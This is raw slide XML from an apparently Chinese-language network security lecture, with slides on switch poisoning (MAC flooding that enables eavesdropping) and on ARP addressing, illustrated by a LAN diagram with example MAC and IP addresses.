            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>交换机完全退化为广播模式，攻击者达到窃听数据的目的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77826" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交换机毒化攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{81556F20-9EF8-4651-B294-D3B86E7C8135}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>117</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3112541540"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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a:xfrm>
            <a:off x="457200" y="1179306"/>
            <a:ext cx="8229600" cy="2815869"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>两层网络寻址：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：逻辑地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，电子科技大学，电话簿联系人</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用于确定路由</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：物理地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，建设北路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>号，电话号码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络接口地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>投递</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238594" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址解析协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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pPr/>
              <a:t>118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2267744" y="3068960"/>
            <a:ext cx="5451475" cy="3311525"/>
            <a:chOff x="1619672" y="3429843"/>
            <a:chExt cx="5451475" cy="3311525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="6" name="Object 7"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3973935" y="3542555"/>
            <a:ext cx="428625" cy="400050"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s666866" name="Clip" r:id="rId4" imgW="428724" imgH="400248" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId4" imgW="428724" imgH="400248" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 83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935" y="354255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Freeform 8"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3438947" y="4452193"/>
              <a:ext cx="1357313" cy="1500187"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T1" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T2" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T4" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T5" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T6" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T7" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T8" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T9" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T10" fmla="*/ 0 w 855"/>
                <a:gd name="T11" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T12" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T13" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T14" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T15" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T16" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T17" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T18" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T19" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T20" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T21" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T22" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T23" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T24" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T25" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T26" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T27" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T28" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T29" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T30" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T31" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T32" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T33" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T34" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T35" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T36" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T37" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T38" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T39" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T40" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T41" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T42" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T43" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T44" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T45" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T46" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T47" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T48" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T49" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T50" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T51" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T52" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T53" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T54" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T55" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T56" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T57" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T58" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T59" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T60" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T61" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T62" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T63" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T64" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T65" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T66" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T67" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T68" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T69" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T70" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T71" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T72" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T73" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T74" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T75" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T76" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T77" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T78" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T79" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T80" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T81" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T82" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T83" fmla="*/ 2147483646 h 945"/>
                <a:gd name="T84" fmla="*/ 2147483646 w 855"/>
                <a:gd name="T85" fmla="*/ 0 h 9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55"/>
                <a:gd name="T130" fmla="*/ 0 h 945"/>
                <a:gd name="T131" fmla="*/ 855 w 855"/>
                <a:gd name="T132" fmla="*/ 945 h 9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55" h="945">
                  <a:moveTo>
                    <a:pt x="151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="123" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="69"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155" y="661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214" y="701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248" y="728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285" y="757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322" y="786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359" y="814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394" y="838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428" y="859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492" y="893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523" y="909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555" y="923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585" y="934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613" y="941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640" y="944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665" y="941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687" y="934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708" y="924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728" y="909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745" y="891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777" y="843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791" y="812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803" y="776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809" y="756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814" y="732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824" y="679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832" y="619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839" y="556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="844" y="493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848" y="433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851" y="379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851" y="356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853" y="269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854" y="244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="847" y="204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="807" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151"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aphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="8" name="Object 9"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="5472535" y="4895105"/>
            <a:ext cx="428625" cy="400050"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s666867" name="Clip" r:id="rId6" imgW="428724" imgH="400248" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId6" imgW="428724" imgH="400248" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 83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535" y="489510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0"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3964410" y="6341318"/>
            <a:ext cx="428625" cy="400050"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s666868" name="Clip" r:id="rId8" imgW="428724" imgH="400248" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId8" imgW="428724" imgH="400248" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 8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4410" y="6341318"/>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1"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="2288010" y="4777630"/>
            <a:ext cx="428625" cy="400050"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s666869" name="Clip" r:id="rId10" imgW="428724" imgH="400248" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId10" imgW="428724" imgH="400248" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 84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8010" y="4777630"/>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2"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5339185" y="5007818"/>
              <a:ext cx="180975" cy="1492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2" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2662660" y="4871293"/>
              <a:ext cx="179387" cy="1492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3" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4161260" y="3912443"/>
              <a:ext cx="127000" cy="185737"/>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4" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4115222" y="6153993"/>
              <a:ext cx="127000" cy="1873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5" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2838872" y="4947493"/>
              <a:ext cx="61436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4207297" y="4104530"/>
              <a:ext cx="0" cy="4889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4796260" y="5072905"/>
              <a:ext cx="542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flipV="1">
              <a:off x="4181897" y="5820618"/>
              <a:ext cx="0"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0"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4426372" y="3887043"/>
              <a:ext cx="209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dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1A-2F-BB-76-09-AD</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Line 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4293022" y="3988643"/>
              <a:ext cx="176213" cy="9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flipV="1">
              <a:off x="5418560" y="5147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2" name="Rectangle 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5004222" y="5441205"/>
              <a:ext cx="2066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58-23-D7-FA-20-B0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4251747" y="6233368"/>
              <a:ext cx="24606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25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4540672" y="6149230"/>
              <a:ext cx="202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0C-C4-11-6F-E3-98</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Line 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2749972" y="5020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7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1619672" y="5331668"/>
              <a:ext cx="2024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71-65-F7-2B-08-53</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rectangle 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3632622" y="4933205"/>
              <a:ext cx="957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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>   LAN</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1849860" y="42886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237.196.7.23</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Line 30"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2495972" y="4541093"/>
              <a:ext cx="0" cy="2460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31"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4564485" y="34885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237.196.7.78</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Line 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4324772" y="3613993"/>
              <a:ext cx="282575" cy="127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5674147" y="4653805"/>
              <a:ext cx="0" cy="24606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Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
